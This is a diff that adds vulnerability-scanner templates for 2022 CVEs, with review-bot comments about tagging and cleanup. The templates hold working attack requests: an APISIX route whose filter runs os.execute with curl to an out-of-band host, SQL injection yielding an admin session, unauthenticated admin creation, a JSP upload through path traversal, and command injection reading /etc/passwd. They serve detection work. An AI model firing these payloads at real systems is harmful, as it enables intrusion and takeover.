+ classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + metadata: + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + shodan-query: title:"Apache APISIX Dashboard" + tags: cve,cve2022,apache,rce,apisix,oast + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + { + "headers":{ + "X-Real-IP":"127.0.0.1", + "Content-Type":"application/json" + }, + "timeout":1500, + "pipeline":[ + { + "method":"PUT", + "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" + } + ] + } + - | + GET /api/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '"reason":"OK"' + - '"status":200' + condition: and + + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - 'http' + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - 'GET \/([a-z-]+) HTTP' + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml new file mode 100644 index 0000000000..c33c0d7f03 --- /dev/null +++ b/cves/2022/CVE-2022-24124.yaml 
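Review bot: The batch-requests pipeline of CVE-2022-24112 creates a persistent admin route (`PUT /apisix/admin/routes/index`) whose `filter_func` calls `os.execute(...)` on every hit, and nothing in the template removes it afterwards, yet the tags line has no `intrusive` marker while CVE-2022-29464 in the same commit tags its upload that way. Change the line to `tags: cve,cve2022,apache,rce,apisix,oast,intrusive` so users relying on the default exclusion are not left with an RCE route on the target. The route also points its upstream at `httpbin.org:80`, so the scanned host is made to hold a route to a third-party endpoint; a follow-up `DELETE` of the route through the same batch endpoint, or at least a comment stating that manual cleanup is required, would make the footprint explicit. The CVE-2022-24112 hunk runs from the previous line into this one.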
@@ -0,0 +1,41 @@ +id: CVE-2022-24124 + +info: + name: Casdoor 1.13.0 - Unauthenticated SQL Injection + author: cckuailong + severity: high + description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. + reference: + - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html + - https://www.exploit-db.com/exploits/50792 + - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget + - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24124 + cwe-id: CWE-89 + metadata: + product: https://casdoor.org/ + shodan-query: http.title:"Casdoor" + tags: cve,cve2022,casdoor,sqli,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "XPATH syntax error.*'" + - "casdoor" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-24260.yaml b/cves/2022/CVE-2022-24260.yaml new file mode 100644 index 0000000000..e0535c78c8 --- /dev/null +++ b/cves/2022/CVE-2022-24260.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2022-24260 + +info: + name: VoipMonitor - Pre-Auth SQL Injection + author: gy741 + severity: critical + description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + reference: + - https://kerbit.io/research/read/blog/3 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 + - https://www.voipmonitor.org/changelog-gui?major=5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24260 + cwe-id: CWE-89 + metadata: + shodan-query: http.title:"VoIPmonitor" + tags: cve,cve2022,voipmonitor,sqli,unauth + +requests: + - raw: + - | + POST /api.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; # + + matchers-condition: and + matchers: + - type: word + words: + - '"success":true' + - '_vm_version' + - '_debug' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - PHPSESSID + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-24288.yaml b/cves/2022/CVE-2022-24288.yaml new file mode 100644 index 0000000000..d5a45b194d --- /dev/null +++ b/cves/2022/CVE-2022-24288.yaml 
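Review bot: The `kval` extractor of CVE-2022-24260 emits a `PHPSESSID` that, after the UNION-based relogin succeeds, is a live Administrator session for the VoIPmonitor GUI, and neither `description` nor the template says so; operators should be told that scan output contains credential material. Add a sentence such as `description: ... The template authenticates as Administrator via the injection and the extracted PHPSESSID is a valid admin session; treat scan output accordingly.` and a `remediation: Upgrade VoIPmonitor GUI to 24.96 or later.` line, which is the bound the description already states. The CWE and CVSS fields are consistent with an unauthenticated SQLi, so no change there.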
@@ -0,0 +1,34 @@ +id: CVE-2022-24288 + +info: + name: Apache Airflow OS Command Injection + author: xeldax + severity: high + description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + reference: + - https://github.com/advisories/GHSA-3v7g-4pg3-7r6j + - https://nvd.nist.gov/vuln/detail/CVE-2022-24288 + - https://lists.apache.org/thread/dbw5ozcmr0h0lhs0yjph7xdc64oht23t + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-24288 + cwe-id: CWE-78 + metadata: + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + verified: true + tags: cve,cve2022,airflow,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command" + - "{{BaseURL}}/code?dag_id=example_passing_params_via_test_command" + + stop-at-first-match: true + matchers: + - type: word + words: + - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2022/CVE-2022-24990.yaml b/cves/2022/CVE-2022-24990.yaml new file mode 100644 index 0000000000..5a4803857b --- /dev/null +++ b/cves/2022/CVE-2022-24990.yaml 
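Review bot: The single word matcher in CVE-2022-24288 only proves that the source of the bundled `example_passing_params_via_test_command` DAG is viewable on `/code`, not that the command injection is reachable, and there is no status or version check to narrow it. If fixed releases (2.2.4 and later) still ship an example DAG containing that literal — I cannot confirm that from here — the template will keep flagging patched instances, so add a `- type: status` / `status: - 200` matcher with `matchers-condition: and` and say in `description` that a match indicates an exposed example DAG that must be confirmed manually. The inline `# Works with unauthenticated airflow instance` comment sits next to a `PR:L` CVSS vector; reword it to `# Only matches when the code view is reachable without login; the injection itself needs an authenticated trigger` so the two do not read as contradictory.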
@@ -0,0 +1,44 @@ +id: CVE-2022-24990 + +info: + name: TerraMaster TOS < 4.2.30 Server Information Disclosure + author: dwisiswant0 + severity: medium + description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. + reference: + - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ + classification: + cve-id: CVE-2022-24990 + metadata: + shodan-query: TerraMaster + tags: cve,cve2022,terramaster,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/module/api.php?mobile/webNasIPS" + headers: + User-Agent: "TNAS" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" + - "TerraMaster" + condition: and + + - type: regex + part: body + regex: + - "webNasIPS successful" + - "(ADDR|(IFC|PWD|[DS]AT)):" + - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick + condition: or + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2022/CVE-2022-25216.yaml b/cves/2022/CVE-2022-25216.yaml new file mode 100644 index 0000000000..736ee3bfa6 --- /dev/null +++ b/cves/2022/CVE-2022-25216.yaml 
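Review bot: The `info` block of CVE-2022-24990 under-describes what its only reference documents: the octagon write-up covers unauthenticated remote code execution, with the `webNasIPS` leak as the first step, while the template says only "information disclosure" at `medium` with a bare `cve-id` under `classification`. The template exercises just the disclosure stage, so keeping `medium` is defensible, but make that explicit, e.g. `description: TerraMaster NAS devices running TOS prior to 4.2.30 leak device and network details via module/api.php?mobile/webNasIPS; the referenced advisory chains this leak into unauthenticated remote code execution.`, and add `cwe-id: CWE-200` as CVE-2022-27849 in this commit does for an information-disclosure check. A `cvss-score`/`cvss-metrics` pair should be added once the NVD entry is consulted rather than guessed here.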
@@ -0,0 +1,35 @@ +id: CVE-2022-25216 + +info: + name: DVDFab 12 Player/PlayerFab - Arbitrary File Read + author: 0x_Akoko + severity: high + description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access + reference: + - https://www.tenable.com/security/research/tra-2022-07 + - https://www.cvedetails.com/cve/CVE-2022-25216 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25216 + cwe-id: CWE-22 + tags: cve,cve2022,dvdFab,lfi,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml new file mode 100644 index 0000000000..c5d5548842 --- /dev/null +++ b/cves/2022/CVE-2022-25323.yaml 
@@ -0,0 +1,40 @@ +id: CVE-2022-25323 + +info: + name: ZEROF Web Server 2.0 Cross-Site Scripting + author: pikpikcu + severity: medium + description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + reference: + - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 + - https://awillix.ru + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-25323 + cwe-id: CWE-79 + tags: xss,cve,cve2022,zerof + +requests: + - method: GET + path: + - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'back<img src=x onerror=alert(document.domain)>' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 401 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2022/CVE-2022-25369.yaml b/cves/2022/CVE-2022-25369.yaml new file mode 100644 index 0000000000..59f1d22aeb --- /dev/null +++ b/cves/2022/CVE-2022-25369.yaml 
@@ -0,0 +1,47 @@ +id: CVE-2022-25369 + +info: + name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation + author: pdteam + severity: critical + description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. + reference: + - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25369 + cwe-id: CWE-425 + remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' + metadata: + shodan-query: http.component:"Dynamicweb" + tags: cve,cve2022,dynamicweb,rce,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Success": true' + - '"Success":true' + condition: or + + - type: word + part: header + words: + - 'application/json' + - 'ASP.NET_SessionId' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/02/28 diff --git a/cves/2022/CVE-2022-26148.yaml b/cves/2022/CVE-2022-26148.yaml new file mode 100644 index 0000000000..315b0b25a8 --- /dev/null +++ b/cves/2022/CVE-2022-26148.yaml 
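Review bot: The request in CVE-2022-25369 creates a real administrator account on the target with two separately evaluated `{{rand_base(6)}}` values, leaves it in place, and carries no `intrusive` tag, unlike CVE-2022-29464 in this same commit. Move the generated credentials into a top-level `variables:` block (the form CVE-2022-29303 uses for `cmd`) so the same username and password are used consistently and appear in the matched URL, add `intrusive` to the tags, and state in `description` that a successful match leaves a new administrator account that must be removed by hand. Whether each `{{rand_base(6)}}` occurrence is evaluated independently is inferred from the syntax rather than shown here, but the cleanup problem exists either way.

```yaml
  tags: cve,cve2022,dynamicweb,rce,unauth,intrusive

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(6)}}"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{username}}&adminpassword={{password}}&adminemail=test@test.com&adminname=test"
    # … unchanged: matchers …
```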
@@ -0,0 +1,56 @@ +id: CVE-2022-26148 + +info: + name: Grafana & Zabbix Integration - Credential Disclosure + author: Geekby + severity: critical + description: | + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + reference: + - https://2k8.org/post-319.html + - https://security.netapp.com/advisory/ntap-20220425-0005/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26148 + metadata: + fofa-query: app="Grafana" + shodan-query: title:"Grafana" + tags: cve,cve2022,grafana,zabbix,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + condition: and + + - type: word + part: body + words: + - '"zabbix":' + - '"zbx":' + - "alexanderzobnin-zabbix-datasource" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' + +# Enhanced by mp on 2022/05/19 diff --git a/cves/2022/CVE-2022-26159.yaml b/cves/2022/CVE-2022-26159.yaml new file mode 100644 index 0000000000..41d6be2d94 --- /dev/null +++ b/cves/2022/CVE-2022-26159.yaml 
@@ -0,0 +1,40 @@ +id: CVE-2022-26159 + +info: + name: Ametys CMS Information Disclosure + author: Remi Gascou (podalirius) + severity: medium + description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 + - https://podalirius.net/en/cves/2022-26159/ + - https://issues.ametys.org/browse/CMS-10973 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-26159 + tags: cve,cve2022,plugin,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' + + matchers-condition: and + matchers: + - type: word + words: + - '<auto-completion>' + - '<item>' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2022/CVE-2022-26233.yaml b/cves/2022/CVE-2022-26233.yaml new file mode 100644 index 0000000000..7a7376e711 --- /dev/null +++ b/cves/2022/CVE-2022-26233.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2022-26233 + +info: + name: Barco Control Room Management Suite - Directory Traversal + author: 0x_Akoko + severity: high + description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + reference: + - https://0day.today/exploit/37579 + - https://www.cvedetails.com/cve/CVE-2022-26233 + - http://seclists.org/fulldisclosure/2022/Apr/0 + - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-26233 + cwe-id: CWE-22 + tags: cve,cve2022,barco,lfi + +requests: + - raw: + - |+ + GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/cves/2022/CVE-2022-26352.yaml b/cves/2022/CVE-2022-26352.yaml new file mode 100644 index 0000000000..b73a664312 --- /dev/null +++ b/cves/2022/CVE-2022-26352.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2022-26352 + +info: + name: DotCMS - Arbitrary File Upload + author: h1ei1 + severity: critical + description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + reference: + - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ + - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 + classification: + cve-id: CVE-2022-26352 + tags: cve,cve2022,rce,dotcms + +requests: + - raw: + - | + POST /api/content/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 + + --------------------------aadc326f7ae3eac3 + Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" + Content-Type: text/plain + + <% + out.println("CVE-2022-26352"); + %> + --------------------------aadc326f7ae3eac3-- + + - | + GET /{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "CVE-2022-26352")' + - 'status_code_2 == 200' + condition: and + +# Enhanced by mp on 2022/05/19 diff --git a/cves/2022/CVE-2022-26564.yaml b/cves/2022/CVE-2022-26564.yaml new file mode 100644 index 0000000000..2ab7c18173 --- /dev/null +++ b/cves/2022/CVE-2022-26564.yaml 
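Review bot: The upload in CVE-2022-26352 writes a JSP into `webapps/ROOT` through a hard-coded `../../../../../../../../../srv/dotserver/tomcat-9.0.41/` path, never deletes it, and the tags line has no `intrusive` or `fileupload` marker even though CVE-2022-29464 in the same commit tags the same class of check that way. Change the line to `tags: cve,cve2022,rce,dotcms,fileupload,intrusive` and add `cwe-id: CWE-434` under `classification`, which is the CWE CVE-2022-29464 already uses for unrestricted upload. The fixed Tomcat directory also makes the check build-specific: a dotCMS install with a different Tomcat version or prefix would get a false negative from this template even if it is affected, so either note that limitation in `description` or consider a second path variant once the product's layout across releases is confirmed.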
@@ -0,0 +1,45 @@ +id: CVE-2022-26564 + +info: + name: HotelDruid Hotel Management Software 3.0.3 XSS + author: alexrydzak + severity: medium + description: | + HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. + reference: + - https://rydzak.me/2022/04/cve-2022-26564/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 + - https://www.hoteldruid.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-26564 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:-1521640213 + tags: cve,cve2022,hoteldruid,xss +requests: + - method: GET + path: + - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>' + - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1' + - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<script>javascript:alert('XSS')</script>" + - "HotelDruid" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2022/CVE-2022-27849.yaml b/cves/2022/CVE-2022-27849.yaml new file mode 100644 index 0000000000..1600ad9e9f --- /dev/null +++ b/cves/2022/CVE-2022-27849.yaml 
@@ -0,0 +1,43 @@ +id: CVE-2022-27849 +info: + name: WordPress Simple Ajax Chat plugin <= 20220115 - Sensitive Information Disclosure vulnerability + author: random-robbie + severity: high + description: | + Simple Ajax Chat < 20220216 - Sensitive Information Disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it + reference: + - https://wordpress.org/plugins/simple-ajax-chat/#developers + - https://nvd.nist.gov/vuln/detail/CVE-2022-27849/ + - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-27849 + cwe-id: CWE-200 + metadata: + google-dork: inurl:/wp-content/plugins/simple-ajax-chat/ + tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Chat Log"' + - '"User IP"' + - '"User ID"' + condition: and + + - type: word + part: header + words: + - text/csv + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-28363.yaml b/cves/2022/CVE-2022-28363.yaml new file mode 100644 index 0000000000..b78b96ed26 --- /dev/null +++ b/cves/2022/CVE-2022-28363.yaml 
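Review bot: The `name` and `description` of CVE-2022-27849 disagree about the affected range: the name says `<= 20220115` while the description opens with `Simple Ajax Chat < 20220216`. The Patchstack URL cited in `reference` is keyed to `20220115`, so the description line should most likely read `Simple Ajax Chat <= 20220115 - Sensitive Information Disclosure. ...`, but confirm against the plugin changelog before settling on one figure. The `disclosure` tag is also the odd one out; CVE-2022-24990 and CVE-2022-28365 in this commit use `exposure` for the same class of finding, so `tags: wp,wordpress,wp-plugin,cve,cve2022,exposure` keeps the tag vocabulary searchable.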
@@ -0,0 +1,42 @@ +id: CVE-2022-28363 + +info: + name: Reprise License Manager 14.2 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28363 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-rpvc-qgrm-r54f + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-28363 + cwe-id: CWE-79 + tags: cve,cve2022,xss,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '<svg/onload=alert(document.domain)>' + - 'Login Failed' + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/cves/2022/CVE-2022-28365.yaml b/cves/2022/CVE-2022-28365.yaml new file mode 100644 index 0000000000..2260c8d8ae --- /dev/null +++ b/cves/2022/CVE-2022-28365.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2022-28365 + +info: + name: Reprise License Manager 14.2 - Information Disclosure + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-4g2v-6x25-vr7p + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-28365 + cwe-id: CWE-668 + tags: cve,cve2022,exposure,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/rlminfo" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Version" + - "Platform type" + condition: and diff --git a/cves/2022/CVE-2022-29303.yaml b/cves/2022/CVE-2022-29303.yaml new file mode 100644 index 0000000000..147affdca5 --- /dev/null +++ b/cves/2022/CVE-2022-29303.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2022-29303 + +info: + name: SolarView Compact 6.0 - OS Command Injection + author: badboycxcc + severity: critical + description: | + SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + reference: + - https://www.exploit-db.com/exploits/50940 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 + - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29303 + cwe-id: CWE-77 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,rce,injection + +variables: + cmd: "cat${IFS}/etc/passwd" + +requests: + - raw: + - | + POST /conf_mail.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M + + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" diff --git a/cves/2022/CVE-2022-29464.yaml b/cves/2022/CVE-2022-29464.yaml new file mode 100644 index 0000000000..ad4db0c895 --- /dev/null +++ b/cves/2022/CVE-2022-29464.yaml 
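Review bot: `verified: "true"` in CVE-2022-29303 is a quoted string, while CVE-2022-24288 and CVE-2022-29548 in this same commit write `verified: true`; any tooling that reads the flag as a boolean will treat the two forms differently, so normalise to `verified: true`. The request body's `button=%83%81%81%5B%83%8B%91%97%90M` is an opaque percent-encoded byte sequence (it looks like a Shift_JIS button label, but that is inferred rather than shown) and deserves a one-line comment such as `# button value is the device's native-encoded submit label; keep the bytes as-is` so the next editor does not re-encode it. The tags line also omits the product; `tags: cve,cve2022,rce,injection,solarview` matches how the other templates here name their targets.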
@@ -0,0 +1,48 @@ +id: CVE-2022-29464 + +info: + name: WSO2 Management - Arbitrary File Upload & Remote Code Execution + author: luci,dhiyaneshDk + severity: critical + description: | + Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. + reference: + - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/ + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738 + - https://github.com/hakivvi/CVE-2022-29464 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29464 + cwe-id: CWE-434 + metadata: + shodan-query: http.favicon.hash:1398055326 + tags: cve,cve2022,rce,fileupload,wso2,intrusive + +requests: + - raw: + - | + POST /fileupload/toolsAny HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311 + 